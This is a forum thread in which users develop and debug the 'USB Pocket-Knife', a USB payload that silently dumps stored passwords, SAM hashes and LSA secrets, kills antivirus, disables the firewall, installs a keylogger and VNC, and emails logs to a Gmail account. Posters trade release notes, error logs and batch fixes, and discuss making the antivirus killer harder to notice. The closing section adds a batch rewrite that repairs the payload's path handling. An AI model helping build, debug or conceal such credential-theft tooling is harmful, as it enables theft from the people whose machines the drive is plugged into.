
USB Pocket-Knife Development


Leapo


This is going to be one hell of a bug fix release. You have no idea how big of a help you've been Tmbomber! :lol:

So far the following has been corrected:

  • Bug Fix - Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
  • Bug Fix - Fixed an ordering issue in Start.bat.
  • Bug Fix - Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat
  • Bug Fix - Fixed a typo preventing the "Dump Mail Passwords" module from running.
  • Bug Fix - Fixed a typo preventing the "Dump Updates-List" module from running.
  • Updated - File structure created by slurp was cleaned up.
  • Updated - Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).
  • Updated - Added a "mad props" section to the ReadMe in honor of Tmbomber!

As for the temp log not being removed (and subsequently causing other problems) I could try adding this before every module, but it's a shot in the dark.

IF EXIST %flshdrv%\LOGS\%computername%\%computername%_TEMP.log DEL /f /q %flshdrv%\LOGS\%computername%\%computername%_TEMP.log

Edit: I very quickly zipped up the payload with the current changes (haven't updated the readme yet, but i did throw in the change log). Give this a try: (link removed, see next post)

Edit2: I figured out why the password apps aren't running silently; I'll have that fixed fairly quickly now.


UPDATE: VERSION 0.8.5.0 IS OUT!

BUG FIX LIST

There were a LOT of fixes this time around, mad props to Tmbomber for the HUGE amount of help!

  • Bug Fix - Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
  • Bug Fix - Fixed an ordering issue in Start.bat.
  • Bug Fix - Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat
  • Bug Fix - Fixed a typo preventing the "Dump Mail Passwords" module from running.
  • Bug Fix - Fixed a typo preventing the "Dump Updates-List" module from running.
  • Bug Fix - Fixed "Dump Mail passwords" not running correctly.
  • Bug Fix - Fixed "Dump Network passwords" not running correctly.
  • Bug Fix - Fixed "Dump Messenger passwords" not running correctly.
  • Bug Fix - Fixed "Dump LSA Secrets" not running correctly.
  • Bug Fix - AVKill Should now operate silently.

Other Changes

  • Updated - File structure created by slurp was cleaned up.
  • Updated - Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).

DOWNLOAD THE USB POCKET KNIFE V0.8.5.0

Includes both U3 and Non-U3 versions. The U3 version has the ISO sources but no pre-built ISO. This release is chock-full of bug fixes, so grab it now!!!

Download Mirrors:

RapidShare, MegaUpload


Ok, first blush...

+----------------------------------+ 
+        [Dump Network PW]         + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+          [Dump Mail PW]          + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump Firefox PW]        + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump IE PW]           + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+       [Dump Messenger PW]        + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump Cache]           + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump LSA secrets]        + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump Product Keys]       + 
+----------------------------------+ 
The system cannot find the path specified.
<my ip address wuz here>
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump URL History]        + 
+----------------------------------+ 
Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs".
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump Updates-List]       + 
+----------------------------------+ 
The system cannot find the path specified.
<my ip address wuz here>
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+            [Port Scan]           + 
+----------------------------------+ 
The system cannot find the path specified.
<my ip address wuz here>
----------------------------------------------------------------------------------------------------------------------------- 

This was done on an XP x64 machine. I had several small alert windows pop up saying "Error 5".

Still digging into it.

One note:

Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs".

refers to:

	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +        [Dump URL History]        + >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
		CSCRIPT //nologo %scriptdir%\DUH.vbs >> %log% 2>&1

This was working. I see you've added scriptdir.

scriptdir is defined by:

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\")

I'm using a u3 drive, so the else part is being used. I'm thinking we're already in \system\progs, so that line defined scriptdir as \system\progs\system\progs\script\.

I'm thinking all the "The system cannot find the path specified." are coming from the "CD %progdir%" and "CD %cd%" lines. I think those CD commands need the /d option ("CD /d %progdir%" and "CD /d %cd%") I'm going to go try that now.


...I'm thinking we're already in \system\progs, so that line defined scriptdir as \system\progs\system\progs\script\.

I'm thinking all the "The system cannot find the path specified." are coming from the "CD %progdir%" and "CD %cd%" lines. I think those CD commands need the /d option ("CD /d %progdir%" and "CD /d %cd%") I'm going to go try that now.

< sigh > wrong on both counts.

It's late & I'm sleepy. I'll give it another look tomorrow.

Night guys, & thanks Leapo for the Mad Props :)


Wow, yeah... mine didn't work well, so I'm gonna try the new new update. I couldn't even get basic external IP addresses to pop up. Neat packaging, however; I use it to piddle with my own personal network. Don't really see the hacker in using it elsewhere... feels like a cracker, but as a useful tool in learning how to work with one's own things, I like it. Good job putting this together, guys! Especially you, Leapo! Good work.


Tmbomber: Maybe it's an x64 issue? Do you have the same issues (including No Disk errors with menu.bat) running on normal 32bit Windows XP?

I know FOR SURE that the following modules work and run silently on my system (tested with the non-U3 version of the payload on Windows XP Home Edition SP3 with no active antivirus)

  • System Info
  • External IP
  • Dump Wifi Hex
  • Dump SAM (PwDump)
  • Dump SAM (FgDump)
  • Dump network PW
  • Dump Mail PW
  • Dump Firefox PW (now works with Firefox 3.0)
  • Dump IE PW
  • Dump Messenger PW
  • Dump Cache (put it in verbose mode, so if it fails it'll tell you why)
  • Dump LSA Secrets
  • Dump Product Keys
  • Dump URL History
  • Dump Updates list
  • Network services
  • Port Scan (Just fixed this)
  • Slurp Application Information
  • Slurp User Files [Large Files]
I haven't tested the following:
  • New silent AVkill
  • Disable Windows Firewall
  • Install Haksaw
  • Install VNC
  • Install Keylogger
  • Install NMAP
Here's a snapshot of my payload as it stands right now, give it a shot: Rapidshare or Megaupload

Edit: bah, tried the payload on another system. Sure enough, a shitload of No-Disk errors cropped up. Now I've got to figure out where those are coming from <_<

Edit2: Also, my attempt to hide AVKill's console window caused it to be detected before it could run. Bugger.

Edit3: Figured out how to make AVKill a little less noticeable, now a prompt only flashes up for a split second. Still working on the No Disk errors.


(tested with the non-U3 version of the payload on Windows XP Home Edition SP3 with no active antivirus)

That may be it right there. I'm playing with the U3 version exclusively.

I just downloaded your most recent update. I'll be trying it shortly.


That may be it right there. I'm playing with the U3 version exclusively.

I just downloaded your most recent update. I'll be trying it shortly.

Nah man, I tried it on another computer and it throws No Disk errors there. The real question here is why would one computer throw No Disk errors while another doesn't...

Edit: With everything enabled, it throws the No Disk error exactly 9 times every time...there's a clue.


Nah man, i tried it on another computer and it throws No Disk errors there. The real question here is why would one computer throw No Disk errors while another doesn't...

Edit: With everything enabled, it throws the No Disk error exactly 9 times every time...there's a clue.

Hi, I'm new here, and I would say that I love your payload. However, the No Disk error: if you disable all the password dumping and the LSA secrets, then it doesn't show up, or at least that's what happens to me. I'm trying this on my virtual machine running Windows XP Home SP2. Hope this helps!


Can someone please give me specific step-by-step instructions on how to install this program on both a U3 and a non-U3 USB drive? And also, where do I enter the data for the Gmail accounts?

Look in this forum. There are step-by-step instructions by me.

If it is not clear enough, please ask again, so I can improve it.

Hope this helps.


Hi, I'm new here, and I would say that I love your payload. However, the No Disk error: if you disable all the password dumping and the LSA secrets, then it doesn't show up, or at least that's what happens to me. I'm trying this on my virtual machine running Windows XP Home SP2. Hope this helps!

Lmao, it's like saying if you don't hack the site it won't get hacked!

It's disabling everything good :P


UPDATE: VERSION 0.8.6.0 IS OUT!

BUG FIX LIST

  • Fixed Slurp2 because it wasn't running at all (bad pathnames).
  • Payload now works properly on U3 drives again (was broken in 0.8.5.5).
  • Fixed an issue that may cause No Disk errors on some systems (might not fix all no disk errors)
Other Changes

  • Folder structure had to be modified to make the payload work correctly on U3 drives again.
  • Managed to make the drive detection script a heck of a lot smaller and simpler.

DOWNLOAD THE USB POCKET KNIFE V0.8.6.0

Includes both U3 and Non-U3 versions. The U3 version has the ISO sources but no pre-built ISO.

Download Mirrors: MegaUpload


How do I let the program know which Gmail account to access and which one to send it to?

Allow me to quote the readme:

Begin by running Menu.bat and selecting "Manage Settings and Modules" from the menu. From here you can enable or disable any of the modules that make up this payload, as well as manage "Other Settings" like the e-mail address the payload will send certain logs to (The Haksaw and NMAP for instance)

Run Menu.bat, select "Manage Settings and Modules", and from the new menu select "Other Settings"; in there you'll find the two options for configuring your email address.


Thank you, that really clears things up for me... and one more thing: in the end, is the program at all self-propagating? Because I know there was talk of letting it propagate once, but I wasn't clear on if that was made to be a feature. Oh, and I did what you suggested, but on both options a popup window says that it cannot find the specified file and it opens up a blank .txt file. Am I supposed to type the email address and password, or what? Also, I'm sorry for the barrage of questions, but I'm kind of a noob....


Thank you, that really clears things up for me... and one more thing: in the end, is the program at all self-propagating? Because I know there was talk of letting it propagate once, but I wasn't clear on if that was made to be a feature.
No, it's not self-propagating, too dangerous.
And I did what you suggested, but on both options a popup window says that it cannot find the specified file and it opens up a blank .txt file. Am I supposed to type the email address and password, or what? Also, I'm sorry for the barrage of questions, but I'm kind of a noob....
You need to have the payload extracted to a flash drive (not a folder on your hard disk) before menu.bat will work correctly.

Ok, v0860... Heeeeere we go.....

I found out that PWDump requires a command line option to be set if you're running on an x64 operating system (something like -O64). I've disabled it on my switchblades, seeing as I work with a mix of x64 and non-x64 machines.

+----------------------------------+
+        [Dump URL History]        +
+----------------------------------+

Input Error: Can not find script file "M:\SYSTEM\SYSTEM\DUH.vbs".

Hmmm...

ECHO +----------------------------------+ >> %log% 2>&1
ECHO +        [Dump URL History]        + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CSCRIPT //nologo %progdir%\DUH.vbs >> %log% 2>&1

That should work ok...

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\")

come to think of it, I have a bunch of things not working...

+----------------------------------+ 
+           [External IP]          + 
+----------------------------------+ 

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+          [Dump Wifi Hex]         + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump SAM FGDUMP]        + 
+----------------------------------+ 
Access is denied.

-----Hashes----- 

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+        [Dump Network PW]         + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+          [Dump Mail PW]          + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump Firefox PW]        + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump IE PW]           + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+       [Dump Messenger PW]        + 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump Cache]           + 
+----------------------------------+ 
The system cannot find the path specified.
----------------------------------------------------------------------------------------------------------------------------- 

and port scan isn't functioning, either.

going to work on it some.

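The two failures Tmbomber traced above (DUH.vbs being looked for under D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\ on the U3 build, and later under M:\SYSTEM\SYSTEM\) both come from the same pattern: progdir/scriptdir are set to a path that is relative to whatever the current directory happens to be when Start.bat launches, and the quotes in SET scriptdir="..." become part of the variable's value. The batch fragment below is an added example, not the Pocket-Knife's own code, showing the usual way to make such variables independent of the current directory: derive everything from %~dp0 (the drive and directory of the running .bat) and use the SET "name=value" form so the quotes stay out of the value. The folder layout it assumes (Start.bat in \SYSTEM\PROGS, scripts in \SYSTEM\PROGS\SCRIPT, logs in \LOGS\<computername>) and the variable names are taken from the paths quoted in this thread; adjust them to the real layout of the release you are using.

```batch
@ECHO OFF
REM Added example, not the USB Pocket-Knife's own code.
REM %~dp0 = drive + directory of this .bat file, always absolute, ends in "\".
REM %~d0  = just its drive letter, e.g. "E:". Because the drive letter is read
REM         from the running script, nothing here probes drive letters, which is
REM         the usual source of the "There is no disk in the drive" dialog when an
REM         empty card-reader slot gets hit by IF EXIST or DIR during detection.
SET "flshdrv=%~d0"
SET "basedir=%~dp0"
REM Strip the trailing backslash so the paths below do not end up with "\\".
SET "basedir=%basedir:~0,-1%"

REM Layout assumed for this example (see lead-in): Start.bat lives in \SYSTEM\PROGS.
SET "progdir=%basedir%"
SET "scriptdir=%basedir%\SCRIPT"
SET "logdir=%flshdrv%\LOGS\%COMPUTERNAME%"
SET "log=%logdir%\%COMPUTERNAME%.log"
SET "tmplog=%logdir%\%COMPUTERNAME%_TEMP.log"

REM With SET "scriptdir=..." the quotes are NOT part of the value, so
REM "%scriptdir%\DUH.vbs" expands to one well-formed quoted path. With
REM SET scriptdir=".\SYSTEM\PROGS\SCRIPT\" the quotes ARE part of the value and
REM %scriptdir%\DUH.vbs expands to ".\SYSTEM\PROGS\SCRIPT\"\DUH.vbs, which is
REM both relative to the current directory and mis-quoted.

IF NOT EXIST "%logdir%" MD "%logdir%"
REM Clear the previous run's temp log before any module writes to it.
IF EXIST "%tmplog%" DEL /F /Q "%tmplog%"

REM CD /D changes drive as well as directory. A plain CD to a path on another
REM drive only changes that drive's remembered directory and leaves you where you
REM were, so every later relative path fails with
REM "The system cannot find the path specified."
CD /D "%progdir%" || (ECHO Cannot enter "%progdir%" >> "%log%" & EXIT /B 1)

ECHO +----------------------------------+ >> "%log%" 2>&1
ECHO +        [Dump URL History]        + >> "%log%" 2>&1
ECHO +----------------------------------+ >> "%log%" 2>&1
IF EXIST "%scriptdir%\DUH.vbs" (
    CSCRIPT //NOLOGO "%scriptdir%\DUH.vbs" >> "%log%" 2>&1
) ELSE (
    ECHO Missing "%scriptdir%\DUH.vbs" -- check the folder layout on the drive >> "%log%"
)
```

Because every path is built from %~dp0, the same Start.bat works whether it is launched by the U3 LaunchPad, by autorun on a plain drive, or by hand from a console sitting on C:, and the U3_Drive.cfg branch that picked between an absolute and a relative prefix is no longer needed. Quoting every expanded path also keeps the script working if the drive or computer name ever contains a space.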